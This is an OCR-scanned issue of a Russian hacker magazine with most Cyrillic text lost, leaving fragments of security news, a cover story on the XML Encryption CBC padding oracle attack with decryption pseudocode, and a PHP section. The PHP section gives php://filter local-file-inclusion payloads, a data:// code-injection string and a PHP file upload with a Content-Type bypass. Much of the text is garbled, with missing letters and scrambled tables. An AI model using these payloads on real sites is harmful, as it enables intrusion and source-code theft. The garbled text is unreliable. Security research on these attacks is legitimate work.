Вы находитесь на странице: 1из 148

Fl

01 [156] 2012

ANDROID

:230.

ENCRYPTION

XML-KOHTEHTA

.
,

----

PHONEGAP:


HTML5


(gam]land

hf.fun media
UJ = . - -

-; _ 0
n:1

iiiiiiiiiiiiiiio

-~ - N

-,rp.HEP
.....
~

lntro

nikitozz )) [nikitozfareal.xakep.rul
ctstep (steprareaJ. xakep .ru )
c(gorl (gorlum@real.xakep.ru )

PC_ZONE UNIS

(magglareal.xakep. ru l
. Klouniz (alexanderfareal xakep.rul

MALWARE SYN/ACK
UNIXOID

Step)) [stepffireal.xakep.ru l

cc dushock >> ( adushockfareal.xakep.u )

xakep.ru

ccgol)) ( golumfaeal.xakep.u 1
(pofakumekay.com )
[ g igorievafaglc . ru )
i xafaeal. xakep . ru l

R-

DVD

ant)) ( antfareal.xakep.u l
ccAd ushock andrushockfareal.xake .ru)
01g 1>> levdokimovdsfagmail.com )


Ui-
Security - pae

ART
-

(aliklaglc. rul

: . : .

PUBLISHING

000 , 115280, ,

. , 19, n,

5 , No 21.

.: 1495/935-7034, :

1495/545-0906

no

. :

1495/935-7034, : 1495/545-0906

. , :

n TECHNOLOGY

( f il atovacl glc ru l

100%. ,

(olgae mlfaglc.ru)

250 ,
. ?
, , :
,

. - .

. :

1-3 ,

- . ,

/korenfeldlaglc.rul

: >> ,

. ,

, nn,

,
- .
, .

, : .
,
, , .
n :

/alekhinalaglc.rul
(polikarpova@ glc.rul
( ]
(t a t arekova@g lc .ru l
/gospodinovataglc u l
(dubrovskaya@gjc.ru/
(bulanovalaglc.rul

l koshelevafaglc. u )
llepikova@qlc.ru ]
llukichevafaglc.ru )

V- : claimfaqlc.ru .

n : (4 95)545 -09-06

nn : 1495/663-82-77
: 8-800-200-3-999
:

101000, , , / 652,

115 !

shop.g lc. ru / xake p.

, , -

77-11802

14.02.2002

Zapolex, . 219 833 .

. :

n . , n
, .

nikitozz, rn. .
shop.glc.ru/xakep
vkontakte ru/xakep mag

01/156/201 2

- n.

: co n tentrglc.ru .

000 , , 2012

001



OMOHKASIRI

004

HEADER
004

MEGANEWS

016

017

Proof-of-cocept

011

hacker tweets
-

SS-

Dropbox AdWords

100

COVERSTORY

030

Adobe

COVERSTORY

COVERSTORY

018
L

Encryption

036

PCZONE

UNIXOID

hnG:nL5

102

107

Linux

042

Windows-apoe

tcpdump

Widows-cce

046

112

did-


Widws-?

117

Ubuntu 11.10

Oneiic Ocelot

050

Easy-Hack

054

SYN/ACK

118

060

D5

064

122

- SpyEye

068

Lotus,

072

Lotus Oomio tll

126

X-Tools

130

--

132

MALWARE

080

Wi32/0uqu: Stuxet

084

bootkit test

BitDefede, ESET NOD32, F-Secue, Outpost Secuity,


Risig >>

088

.N-

.NET Famewok

094

098

NAS
5- 6- NS-

Silicon

074

FERRUM

PoweSP060GBSSOV30525

PHREAKING
Loop
, n
n n

136

FAOUNIED

139

142

WWW2

FAQ

8.5
w-

144

2012
NY2k+ 12

EGANEWS

I
<< .

UBUNTU

SIRI


OMOHKASIRI

UBUNTU 06
n n

iPhone 45

Applidium

111

~.)

'.1

" On 19 rem1n d me
l's dad's b<rlhday "
'~ ~:J' r1

1'3 -cL 1

,(!

rJer '::,r

111

5ii,

i05 5.

n ,

n
. ,

19

Saturday
2012

n 5ii n
. -,

Oad's brrthclay

Andoid,

n 5ii
r;

~ ''1'

iPad.

Applidium: appl idium .com/en/news/

"

cack i ng si i .
:

iPhone 45

Canonical,

Debian,

Ubuntul , Ubuntu

n -

, n .

5. n 5ii

n , R- .

, n n

no
iPhone 45 .

Canonical ,
Windows 8, n

n\n,

. n,

. ,

. ,

Applidium

n ,

<< BCKpTA Siri .


,
n
,


Sii
.

n, .


>>.

iPhone

Apple . n,

Ubuntu 14.04, 2014 . n,

, n

n << n>>.
Canonical n
Ubuntu 12.04, n n
2012 . , L5-

[ n),

Windowsxp
WINDOWSXPCTAJIAKCO

APPLE

(CHRONOPAYI

, STEAM .

I .

. ,

! -

comScoe,

, -

, n

DDOS-ATAKY (Assist),

50,81

<<>>.

Steam.

001,

01/156/2012

ltel 11 11 -11 11 11 11
, .
ltel 2011 . . ltel, ltel, ltel . .
* .

MEGANEWS

& F , 600 .

POLAROID

DNS

, DNS-apeco.
, ,
-
n.
DNS -

2008 n
Polaoid
,
w

11-

Hotmail, Gmail, Google, Microsoft


, Uol, Terra Globo.
, , , google .com ,
I- Google,
-. n
. n,

Google n
n Google Defender, n
.

, ,
27-

Polaoid
n

n ,

, 11-

n DNS-cepepax

n n

, DNS-.

, , n

Ghost Click .

Polaroid

Z340
ZINK

lnstant Digital Camera.


Zero lnk Printing, n

, n

DNS Changer.

OS
DNS.
I- n 15

Windowsoep

n . ,

! ,

n >> , .

, n .

n ,

. , , n

,nn

n .

n .

2, 7"

14 Mn.

100

, n

500

[ n], n

SD .
I 43 ] F/3,2.
[ -1280 720 n ]. Polaroid Z340 n
76 102 , $20 30

<<

. - ,

no

25 n.

14

, << n n

. - [ - ]
,

, DNS-cepepa

Polaroid. Z340 lnstant Digital Camera $300.

ln ternet Systems Consortium .

Rove Digital.

- , n .

, .
- ,
, .

AVIRA

AESCRIPT.DLL

006

EstDomains-oeoro ,
nn , .

2008, n

ICANN

n .
n

22

85 r~ .

01 /156/2 01 2

MEGANEWS

, CONSUMERIST, RIAA .

, WI-FI,


.

,

1.6.4.

. ,

, .
,

,
.
, ,
,
.

CMS,

, .

, , ,

. ,

6 ,

1.6.4,

, ,

. -, ,

10 ,

/GS. ,

, , ,

, 802.11 .

-,

. , ,

iPhone45,

[ 100 ),

802 .1 1, .

, .

, ,

[CDN) .

Apple n
- :).

.
, - ,
- .

,0-'--~

- - - -
., ,_",,.,,..

- " _ ,._""_, ___ - - ,.


.... ......

. , - ,

. ,_,.

__

(<~

....... , ... , ..

'<I';J

..~.....,<Jo
"' I" O.""*'nr l """ "' '" ''' '"""" "'
--~ ' """"" " L>oo< , "' - ! r.=oo _ _ ,,... ..
1 . ,.... .

WEXLER.BOOK 7001. Wexler


WLR. 7001 7.0"
,

Jj

._d

.....

008

Firefox with Bing


ing

. 4

( 32

microSDI ,
, ;

~
KaneOIAII~

F. -

<< ,

GGL!~~ -,

lterfilm.ru

1500 mAh, ,

Big

WEXLER.BOOK 7001

Microsoft.

Puzkarapuz.ru .

: 5 990 .

Firefox.

01 / 156/201 2

t'

' !..'

' ..;;.

'

<~ t19.
.f

~~

~-

. , ....... - . ...
- - . .l . ~;
.,

'

'

1.

1.

. U> -z... \--.:,,,.

j ll_ ~:-~<. 1 .
~< , 50%
: : r.- (495)-663-82-771 shop.glc.ru

MEGANEWS

ENTENSYS COMMTOUCH , 6, 7% n .

,
>>

.
YouTub e

:
Aoymous

[Zetasl

. , >> ,
, >> ,

. ,

26 2011

- . ,
- .
-.

Anonymous

- ,

. ,
,

, -
>>
, ,

. , OpCatel [n
~. ,
, ,
,
.
, , -

OpCatel .
.

.
, ,

, , .

Lolita City - ,
100 .
F e edom Hosting,

Anonymous n

>>. Opeat io n Daknet

.onion- Hidden Wiki,

. ,

S- .
,

Lol ita City


. n

2000-6000
.

. -

SQL- .

, , ~

Feedom

Hosting . ...
: F eedom Hosting,
40 ,

38

n:

pastebin . com/1 LH nz EW.

<<IT
.

,

>>
010

01 / 156/2012

laEdiStrosar:

laiLLUMINATI:

laRuCTFE:

>> [

OldEuOpe

#RuCTFE
RWTH, ,

t.co/IUII94Ko .

l.

1!!!1 :
lilil CTF

ciWeldPond:
cljkouns:




. Ggl--

Google,

OllyDbg
_noRE.exe

IDA

ciStephenwest:

1!!!1
lilil

I-: http:!/4 ..2;


http:/196.4; ht.p://71.3;
ht.~ .

-. :1
, Google

Wi-Fi,
_nomap. :1

...
clinsitOr:


ciRogunix:

DS/-

ICMP efCount
TCP/IP [MS11-083I 232
UD-, , 250

Oday BIND.

4. lf

How to do pentest:
1. Daw line with .
2. Check line.
3. lf visie, woks .
line, does not wok .

1!!!1 :
lilil - .
pentest?
1. [) .
2. .
3. , ,
4. , ,

.
.


DNS- cepepa

BIND,

DoS Oday.

52.

t.co/aY.PCMyRy.

lafjserna:

Micosoft/MSRC .
!

Google.

Shodan

++.

Siemens Simatic.

t.J;o 1l1Q0b3cq .

cljduck1337:

1!!!1 :
lilil . SCADA-

: bash: ./:-

. S-
- .

1!!!1 :
lilil -
,
,

. !

cljOOru:


clmikko:
-

Windows [NT/2000/
XP/2003Nista/2008/7/81.
: .. _o/oBiJ;17 .Q .

: << .

#wostpasswod

1!!!1
lilil

. ?

01/156/2012

:1

011

( 926 ), ,

MEGANEWS


Nito,

lociJtionofinfected computer s

tioUIIpi8CIIIftlleM

, n
? ,
, .

n ,
.

PC.WNieO.US,...IJ

.,_ICWIIIcll'rlllf.
~llwpop~

- VideoGhost,

WUII~4if ... tflt.tllilo


-!I\IC11WiW
.-,.un

. ,
, .

ol~oi!Wpail~

IO'f2~htountry

,...,.

loulwdCIidlotor&D

fiOclns' l'lt.........IOif

,_,.,otortcrn-

, [
-- 2 ] .

VideoGhost

,
US-. US-
n - ,
.
US-,

Stuxnet, , -

n , n .

cVideoGhost .
VGA, DVI DMI,
$200.

, ,

Symantec. ,

Nito,
n ,

29 19 ,

[,

]. n ,

n. -
,

Poisonlvy].

, .

Symantec ,

. Nito :
, .

&

& BSUP a

GGL,

FACEBOOK.

&

Tusted Fiends

Andoid ,

ICANN

<<.

no nn

012

18,7%,

Mini,
13,1%.

01 /156/2012

MAIL.RU GRU , Twitter. , .

HAANDROID'E

BITCOIN

BITCOIN

BitCoin

n .
,

, . ,
n

Mt Gox,
BitCoin,
, . , BitCoin

FXI ,

The Cotton
Candy

$200,
n


2012 .
,

cWindows 8
.

, ,
, n
.

lntego,

Devii Robber,

BitCoin .

.
,
, ,
, ,

Bi tCoin,

DeviiRobber

05 ,

n
.

The Pirate . ,
Graphic Converter 05 .

FXI

The Cotton Candy

[ - << >> ,

n
,
. ,

Devii Rob ber

21 , , ! .

itin - ,

U5-,

. R-

5am sung Exynos 1,2 [

, 5amsung Gala xy 5111.


Mal i-400 , micro5D [ 64 I ,

Bluetooth, HDMI2 .1

Firefox,

5afari

Vidalia-
TOR.

U5B 2.0. ,
n 1. h Cotton Cand y
Android 2.3.

, D evii Robb e roapye

, , ,

Wi-Fi

. De vii R obberae ,

Android.

, ,

BitCoin
Oper

HDMI, U5B [ n
!. Bluetooth ,

Microso ft n ,

. ,

Android

Market,

BitCoin.

: 1 n
2, ,

50 , 1

, GOOGLE ?


, n ,

.
,

SSID

, n ,

Bi tCoi n. -

n
,

<<_NOMAP>>,

GOOGLE

n , ,

01 / 156/2012

, .
, .

BitCoin, :

- >>.

013

MEGANEWS

LINUX3.1, kl . g .

CTAHAADOBE

FLEX

FLASH
,
,
, , n .


, , , n
.

iSpy n

100%.

, , n

iPhone ndid

[magnified keysl. iSpy n


n, n,

n n
- !
,
.

n ,

d Flash n

60

n ,

90% .

. n n

n . n , ,

750

( 7

n n .

% n!

n DSLR-aep n n

n .

12 . iSpy
magnifi ed key n -

dobe n n n
Fla sh l . Fla sh
n n
, n n

Adobe Al R

n n.nn

Android

PlayBook, n
Flash Player

n .

n n
n

HTML5. n

n , n
n

Apple,

Flash . , , n

, n-n

Flash Pl ayer iOS.


Fla sh Pla ye r n Apple iOS
,- n . Adobe Fl ash
n - >> Apple.

, n

Flex SDK. Flex 4.6 SDK,


29 , n n source.

AMAZON

GGL

Shdd Challenge

, 2012

, .

47

DARPA

50 .

011.

42

01/156/20 12

500 Wikimedia.

IPHONE
~~>>

iPhone Dev-Team
n

. ",--"

iPhone4S.


.

n,
,
.

iPhone 45


. Chonic

DevTeam iPhone

. , , ,

iPhone,

& , .
, , ,

, iPhoe
:

45, iPhoe
iPhone 4 iPhone 3G5,

. ,
,
>> . , ,

. :

51 -

& , ,
,

. &

! >>, >>,

, l.
, -

youtu.be/gofpeiTXI5U. :

&

space

1611)

<< >>;

51 - &

T-Mobile;

, Wi-Fi !

<< >>,

<< >>;

);

<< >>,

<< >>;

iPhoe ;

<< >>;

EDGE

51 -,

51 - T-Moile

. ,

<<

20-30 ;

iPhoe,

>> iPhoe T-Moile,

<< >>;

MCAFEE:



75

01 / 156/2012

015

.HEADER

Proof-of-Concept
SS-

100

, .
, SQL-,
, ,

. , ,-

map,

sql-

SQLi

. ,
SS- . - .

Damn Small XSS Scanne [DSXS).

XSS

. Coss-site scipting

SS- -

[XSS]-

n.

GET-

S-

SS-,

n , n

n- n , n

n JS-.

-n

Scanne

Damn Small XSS


[DSXS]

n .

-, .

SS- n

n L-

n GET/POST-anpoca .

- , ,

n, n

[
] ,

-.

n .

n- n.

n n

n,

< hef= " ... ">, ,

> -

SS-.

SS-n. ,

-n

n . n ,

DS XS

. ,

. -

. n,

n,

L- <scipt> .. </scipt> [ n
] ,

n JavaScipt-o. ,

n, n

n n],

L- < hef= " ... ">,

DSXS

n [

. ,

> n n JS-,

<scipt> ...</scipt>.

n. , ,
n n

n XSS
zero.webappsecurity.com

016

DSXS

Use-Agent, Rf

, n SS

n GitHub [https:Ugithub.com/
stampam/DSXS ]. ::

? n

Python,

Cookie

- .

01 / 156/ 201 2

HEADER

10 DROPBOX
ADWORDS
10

[ ] :

, , ,

1. << >>.
2. [, D].
3. ,

50

. -

$99,00 . ,

[, , ,
, ].

3.

>> : ,

600

250 . ,
1 , ,

- . ,

.
>> ,

, D,

-.

: d, f oline stoage,
f,

online backup

, - ,

, D -

- , ,

URL

online backup, online backup data,

, ,

[, it . ly/ud69i ]. ,

Google.

space.

. ,

D Refeall Status [,

httR:Udb.tt/UfxuFBm ]. , .

10

, D

. AdWods !

,
, .
,

. ,

[Cost-Pe-Ciick].

[ it.ly/xNKyB ].

. -

D- .

, ,

, .

? , ,

? - ,

. - . ,

D. -, .

:]

AdWods,

-, AdWods, , ,

?,,- . ,

Google]. . :] :::

! ,

Google,

1000

. .

Qit.

l y/AEsg1 $75
AdWods, ,

.: ] ,

e-mail [

- ], [
-

about.me], .
e-mail.

Updated

Statu.s

3/ 26/ 2011 7:4 5

,.

3/26/ 2011 6: 52
3/ 26/ 2011 6:37

Jo ined
Completed
Jo ined

3/ 26/2011 6 :08

Jo ined

3/ 26/2011 5:23

Completed

3/26/ 2011 5:14

Completed

Google AdWods [ adwods.google.com ].

3/ 26/2011 4:49

Completed

3/ 26/2011 4:32

Compl eted

[ ] .

?
? , ,-

-7

>> .

[ ,
, ],

01/156/2012

- 250 Dropbox

017

COVERSTORY

lplaintextl llirstfaplaintext .su, www.plaintext.sul

BEAST Padding Oracle Attack


.NET Framework,

Encryption,

XML

L-.

XML ENCRYPTION
www.w.org/TR/
mln-r/

Framewok "ax [ n

XML Encryption

w .

bit l/u
r

XML

Encryption.

XML Encryption,

2002

XML
.NET, Apache Axis2,

JBOSS . .[.
-
n,

Microsoft

Encyptio n n

XML

Red Hat.

,
L- ,- ,
L--
. n
, n

nn , - CBCI.

018

, n

AES

DES . n

AES [

01/156/2012

ISJ*iiirIId

, n

XM L En cypt ion

16 , 128 !

. ,
,

.
n ~ .

IIVI,

XOR,

.

,

IV1[0]

//

AES_ENC(k, IV xor [ 0 ]);


AES_ENC(k, C[i- 1] xor M[i]);

[0]

C[ i]

//
[ 0 ]

M[i]

AES_DEC(k , [~) xor IV;


AES_DEC(k, C[i] ) xor C[i- 1] ;

k-

, - , - ,

IV-

ll.

Attack.

BEAST

P addig

. .

, , :

XOR

IV

MSK, IIV MSK, C[DJI


[) MSK. ,

. ,

12

Dx05. ! 16 !,
, 15

MSK,

, 16- 10.

. ,

XM L En cyptio.

XML

En cyptio

, .

, , ,

ASC II .

ASCI I

, NULL ! Al,
! Bl. ,

, ,

>>. ,
, n

. ,

,

16

tue, [) =

AES_DEC _
CBC[k, IIV, C[OJII NULL, false -
.

, ,

.
:

1.

IV1,

[I V1, C[O] I .

niV,
lniV, C[O]I . tu,
false .


! !

01/156/2012

IV1

= iV,

019

COVERSTORY

WS-SECURITY
WS-Security -
SOAP, _
-. WS-Secuity XML Encyption XML
Signatue.

2-3 ,

, ,

2.

. [] ,

! .

[0].
XOR []

IV.

[, AES_DEC ,

msk =
repeat

XML

XML ENCRYPTION

Extesie Makup Laguage [

msk++
IV2 = IVl xor ( . .. e llmsklle ... )
11 msk j -

XM LI

XML

, < >

[odel.

until Server((IV2,

[ ] ))

==

, ,

true

11

"

[
, . .l

Iput:

XML.

Output:
j-

&lt; &gt;
&

&amp; >>.
XML ti.
W XML Sigatue W
XML ti, XM L

[]),

s-

XML

C=(IVl,

XML

X[j] = ASCIICode(NULL) xor IV2[j]

retur

X[j]
= AES_D EC(k, [])

XML

ti,

. ,

[ , , . . l .
. j-
, ,

j-

<CipheValue>, ,
, .

. , ? : .

<EcyptedData>.

!:

,
,

AES_DEC_CBC(k, (IV2,
IV2 xo r [].

[]))

IV2 xor AES_DEC( k,

[])

. <CipheValue>

<?xml version= ' 1.0 ' encoding= ' utf-8 ' ?>
<Enc r yptedData Type = ' http://www.w.org/2001/04/xmlEnc#Element ' xm lns = ' http://www.w.org/2001/04/xmlEnc ' >
<Enc r yptionMethod Algorithm = ' http://~~.w3.org/2001/04/xmlenc#aes128-cbc ' >
</ Enc r yptionMethod >
<Keyinf o xm lns = ' http://www.w.org/2000/09/xmldsig# ' >
<KeyName >Jo hn Smith</ KeyName >
</ Keyinf o >l
<Cipher Data >
<Ciphe r Value >A123456 ... </CipherValue >
</Ciphe r Data >
</ Enc r yptedData >

020

XML Encryption

01 / 156/ 2012

XM L

E ncyption

n n ,

<EncyptionMethod>.
n n n,

n L- .

, L-,

. ?:-]

XM L ti

v Secuity,

n n

. ,

L- !

XML], n

. n

. . ,

n <EncyptedData>. n td

!, , -,

Element -

, L-

, . ).

. Encypted

-,

Content

, .

, . . n Encypted

,- -.

Text

Contet,

n Encypted Contet,

Paddig

l-,

. , n n

Oracle Attack,

Axis2,

ASP.NET),

.net.

. , n

XM L Famewok'o

n .

- .

UTF-8,

XM L E cyption

n n

, .

,

S-.

, n

XML

. n

Receive,

UTF-8-

, ,

lline feed ]

lcaiage tu]. , n

ASCII

Dispatch . Message
message flow
SOAP n ,

UTF-8.

n,

ASCII

128

Axis2 . :-]

! 4]. ,
,

AXIS2

- ,

Axis2.

,
tue
n n
-. nn

secuity

Apache Axis2

Famewok,

Rampat WS-Secu ity.


n
Signatue

XML

Encyption

false

. n

1.

fault.

secuity

fault

XML

. , ,

SOAP.

Axis2

Famewok, n

? , n

001

lmessage flow]. lmessage flow]-

S- ! ],

OxlO,

n n

n ,

2.

n n. S-

n, n

n>> ,

Message

Receive, , ,

Sevice n .

, D - , ].


: st, Secuity

Axis2
Dispatch . Secuity,

ASCII Oxl F ! 09,

- L-
, &

IOx26] < >> > .



XM L SIGNATURE

n ,

XML Signature -

n W.

ASCII !
]. n n
n >> <<& >> < >>,

n n n

XML

01/156/20 12

XML.

021

COVERSTORY
. ,
, , ,
, 16-
, tue

false.

, <<> S

, . ,

tue, SOAP(AES_ENC_CBC[k, [IV, CIJI


secuity

fault, false .
fault ,

, secuity

, L- :

PAD(M) ;; (IV xor AES_DEC(k,

10

Handlers (intercepters)

))

, L-<>,

Message flow Apache Axis2

</>.
2

<<&>>,

<<&gt.

. [FindiVI
. ; [IV, [1], ... , C[d]l

s-,

i, << >>

(;[iv, C[i]l.
secuity

fault,


, ,

, .

[FindXbytel <<n
>> [
FindiVI j- X[i][j]
X[i]; AES_DEC[k, C[i]l. ,
.

.
.

C;[IV, [1], ... , C[d]l,

Input: (;([ 0 ] ; IV,


Output: ;([ 1 ),

[ 1 ),

'

C[d))

M[d))

.
,

C[i] C[i-1].
,

for i ; 1 to d do
iv ; FindiV(C, i)
for j ; 1 to 16

ASCII [

UTF-81. ,

X[i)[j) ; FindXbyte(C[i), iv, j)


end for
X[i]
(X[i)[ 1 ), ' X[i)[ 16 ))
M[i] ; X[i] xor C[i- 1]

, n
,

Dx01 [
!.

end for
return ([ 1 ],

'

M[d))

.
,

[ ,

! .
:

--

FINDIV FINDXBYTE
FindiV n

, , ,

W n web-sevice n ,
n n n

FindiV FindXbyte .

machine-

- .

to-machine-a . n n

n - n

, , ,

. n

, ,

WSDL !Web Sevices Desciption Languagel, XML. -

: <

, nn n

01 .

RPC IRemote du calls,

IV,

!,

SOA !Sevice-oiented achitectue,


- ! REST [Repesentational state tans

- , , ,

fel. n

n n

, , <<

GET, POST, PUT, DELETE

n , n .

022

. . n

FindXbyte. n ,

f-3 .

01 /156/2012

Dec.

Char .

Block

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

NUL
SOH
STX

ENQ

07
08
09

BEL
BS

LF
VT
FF
CR

OD

so

OF

SI

32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

20
21
22
23
24
25
26
27
28
29
2
2

10
11
12
13
14
15
16
17
18
19

DLE
DC1
DC2

DC4
NAK
SYN

CAN

su

ESC
FS
GS
RS

1D
1

us

1F

Dec.

"

&

'

(
)

-'

2D

2F

1
Block 3

48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

1
2
3
4
5

7
8
9

:
;

<

3D

>

64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79

40
41
42
43
44
45
46
47
48
49

Dec.

80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95

F
G

4D

4F

50
51
52
53
54
55
56
57
58
59

96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111

Q
R

5D

5F

112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127

Char.

60
61
62
63
64
65
66
67
68
69

Encyption

'

i
j
k

6D

m
n

Block 7

lock

Block 5

30
31
32
33
34
35
36
37
38
39

Char.

lock

SPC

Block 1
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

Char.

Block 2

00
01
02
03
04
05

Dec.

XML

70
71
72
73
74
75
76
77

1
}

78
79

7F

DEL

7D

ASCII

. - , n

-, -, n

[ ,

. n

-, ,

[ ]. , ,

XML 5chem'

n. ,

, ,-

[L-]

, ,

. , ,

[, 150/IEC
n

, , ,

19772:2009],

051 [n
, XML Encyption 55L/TL5,
n 5] .

. ,
,

XML

Encyption . , ,

[ . ],
u .


,
,

n , n n

n . ,

XML

5ignatue.

, n

XML

5ignatue

Wappig, , n

XML

epic fail .

Encyption

side-channel,

, -
, n . n

nn / .

Juaj 5omoovsky i Jage,

n- ,

, n n

n n .

. ::

01/156/2012

023

PrOxor [php.m4sqllagmail.com, rdot.org/foruml

$ FILES
,

'-"


il . ly/sfDcys
noce

L ightig

,
,

Template.

4.3
. [

blt.ly/ttvWV -

, . . l <<

LightningTemplate.
it.!y/mdrdqf
ca,

File path

injection.
pastebln.com/1edSuSVN
- n

>> .
.
,

, .
,
:

print _r(st r eam_get _fi lters());

File path

injection.

. steam _ filter_ append/

it . ly/g6ztD -

$_FILES.

':,~qt\0~

-____... ,.

contents

fopen,

......,.., .L.oc...... ",....,__Pif'

~~

file_get_

. .. ....

.....__llriWolo,..,

1....... - .

. .

lt II PHDOd( ' lllrJWII ' ) I

,..

'.. t-l&tO ftiH~ t ... t

- tM kLU I ~>laLO""

-I. ,koll -~-" . -l" or t llo """'""' ""-1


: r_t...., ...,..
" ot coo Lol lotpor.,. ...,.. N-l td tM-

--.1-.....

n.

~ r .,...

'!"lt1

tA8'p tr.., tor 'Dltto -L< -

<~

t - L rLI (r.-o. .u

8~LIUI

' I - - - 1 8UI--Oil

cL-

: , -~lojlaiJ
IIIp_t_I...., _II i r c tlld.o ..._...,r_Hiter


n .

01 / 156/2012

steam_filte_pepend n n php://f ilte.



, ,
.
:

$fp = fopen( 'php :// output ' ,


stream_filter_append($fp,

i f ($closi ng) {
$consumed += strlen($this->_data);
$str = nl2br($this->_data);
$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);

' w' );

'convert . quoted-printae-encode ' );

fwrite($fp, "I \ v Love \ v PHP .\n" );


,

POST, Base64 :

readfile( "php: //filter / read=convert . base64-encode/


resource=php: // input" );

Secure [9ist.github.com/600388/cd99ae03c3

<head>
<meta cha~set= "utf-8" />
<tit1e>{{ tit1e }}</ tit1e>
</head>
<bodY>
<h1>{{ tit1e }}</h1>
< > 11 {{ name }} </ >
1

< > {{

meagelafe

}} < / >

< h2 > Iteiil </ h2 >

<u1>
{% fo~ ite!il in ite!il %}
{% i f ite!il %}
<1i>{{ ite!il }}</1i>
{% endif %}
{% endfo~ %}
</u1>
</bodY>
</htm1>

, .
, ft-,

gz-,
:

co py( 'compress.zlib: // ftp:/ / user:pass@ftpho st.com : 21/


path / file. dat. gz' , '/local / / of / file . dat' ) ;
php:// filte
- . ,

include ($_POST[ 'inc ' ]) ;

sample.php #

allow_ ul_ic l ude


= Off >>
RFI.

< ?php

require_once

'Lightninqemp1ate.php' ;

--

S- :

~ite!ils

= array(

'hoge' , null, '<b>fuga</b>' ,


inc=php://filter/read%3Dconvert.base64-encode/resource%3D/
path/script.php


,
-

. !

lG

'piyo' ,

) ;

$1t = new Lightninqemp1ate( '8Iilp1e . htm1'


$1t->tit1e = 'Samp1e Temp1ate' ;
$1t->n8Ule = 'Yo~1d' ;
$1t->Iilessage = '<b>hi'</b>' ;
$1t->ite!ils = $items ;

);

echo $lt ;

, , ,
. -

sarnp le_ca che.php #

. ,
12.

< ?php

. ,

require_once

filte !
] .

, .

te!ils = array (
'hoge' , null, '<b>fuga</b>' ,

$1t = new
private $_data;

, $closing
TRUE. :

01/156/2012

'piyo' ,

);

$this-> _data >> :

while ($bucket = stream_bucket_make_writeae($in))


$this- >_data .= $bucket->data;
$this->bucket = $bucket;
$consumed = ;
}

'Lightninqeiilp1ate . php' ;

Lightninqemp1ate(

'amp1e.htm1' ,

1
1

new

Lightninqeiilp1ateCache_Fi1e( '. /cache' )

);

$1t->title = ' Samp1e Te!ilp1ate' ;


$lt->n8Iile = 'Yo~1d' ;
$1t ->meage = '<b>hi!</b>' ;
$1t- >items = $ite!ils ;
n

Lightning Template

025

COVERSTORY
if ( !empty ($t his->bucket - >data))
stream_bucket_a ppend($out, $th is->bucket);
return PSFS_PASS_ON;
}
,

PSFS_PASS_ON.

include ( "./LightningTemplate.php" );
$lt = new Light ni ngTemplate(' . / sample.html' );
$lt->title = ' Title' ;
echo $l t;
L-:

. .
:

stream_fi lte r_register( 'convert.nlZbr_string ' ,


'nlzbr_filter' );

<html >< head>


<meta charset= "utf-8" />
<title>My Title</title>
</head></html>
,

L- . ,

include,

, ,

- ,

, .

. ,

Google Code

Seach.

steam_filte_egiste.

L-. :

Lighting-Temp l ate !
!, . ,

sample.html:

function fi l ter($i n, $o ut , &$cons umed, $clos i ng)


while ($bucket = stream_b u cket_ma ke_wri t eae($in))
$patterns = array (

puic

'1\{%\s+if\s+(.+?)\s+%\}/e' ,

<html><t:Lead>
<met a charset= "utf-8" />
<t itle>{{ tit l e }}</t it l e>
</ head> </html >

);

$replacements = array (
'"<? php i f ('. \$this->condition($1). '): ?>'" ,

2
3
4
5

class nl 2 b_fi ~e extends _Use_F i ~e {


private $_data ;
/* n t
function onC eate ( )

9
1
11
12
13
14
15
16
17
18
19
20
21

$this-> _data = ";


eturn true;

7
8

. , ,

}
/* n /

g_l

puiic

. ,

function

fi~er($ i n ,

$out , &$consumed, $closing)

{
/*

.,
while($bucket =steam_bucket_make_writeae ($ i n))
{
$this-> data .=$bucket->dala;
$this->bucket = $bucket ;
$consumed = ;

/*

( ukt).

.,
if($closing)
{
$consumed
$st

+= stlen($this-> _data);

= nl 2 b( $bucket-> _data};

if(!empty($this->bucket->data))
steam_bucket_append($out ,

PSFS_PASS_ON;

{% if print_r (i ni_get _a ll ()) %}


- -. ,
,
. , :

include ( " . / MYLightningTemplate.php" );


$f = $_POST( "file "];
readfile ($f);
, .

$this->bucket->data =$st;
$this->bucket->datalen = stlen ($this -> _data);

etum

'$_data'

026

'"<?php if,

. ,

22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

);
$bucket->data = preg_replace($patterns,
$replacements, $b ucket->dat a) ;

$this->bucket);

S-

file :

file= ph p://filt e r /rea d%3dconvert.light ni ng_temp l ate_fil ter/


reso urce%3d
data://tex t / pl ai n % bb ase4, e yUg a WYgcHJpbn R f cih p b mlfZ2V0X2

Fs bCgpKSAlfQ
,
,

, ,

01 / 156/ 2012

-----------------2421143186617

S- :

----------------------------- 2421143186617
-
php_use_filte.

: filte, t, oCiose.

Content-Disposition: form - data; name= "uploadfile" ;


filename= "hello . txt"
Content-Type: text/plain

filte, :

1.

$i - , ,
<< , .

2. $ut- , ,

<?php

echo ' Hello!! ! ' ; ?>

----------------------------- 2421143186617 --

3. $cosumed- , ,

4.

, .

hello.txt, < ?php echo

$closig- , ,

- ,

'Hello! !! ' ; ?>.

TRUE,

phpseUm44, hello.txt.
,

filte

).

1. SFS_SS_N-

$_FILES :

2. SFS _ FD _ - ,
$out .
3. PSFS_ ERR_FATAL ldefault) - pooa .
[t/is ,
. !,
), t,

Array (
[uploadfile] => Array (
[name] => hello.txt
[type] => text/plain
[tmp_ name] => /tmp/phpseUm44
[error] =>
[size] => 33

. t

FALSE
TRUE . o[lose

! ).
,
steam _fil te_egiste.

, $_FILES[uploadfile][type]
Cotent-Type, .

, -,

, :

. , ,
.

$_FILES[ " file " ][ "type " ] == " image/ gif"

tl

move_uploaded_file, .

getimagesizel). , ,

, , . .

, IF-

, .

- . ,

. , -

, ,

pic.php.myext -.

, -

,
L-, :

,
.

, $_FILES.

<form actio=upload.p h p method=post


ectype=multipart/form - da t a>

<input type=file name= uploadfi le>


<input type=submit value =Upload>
</form>


, ,-
.
bugs . php.et ,
, - .

:) ,

Upload, S

/ ,

, Cotent-Type

$_ FILES [ uploadfile]

[name] . ,
,

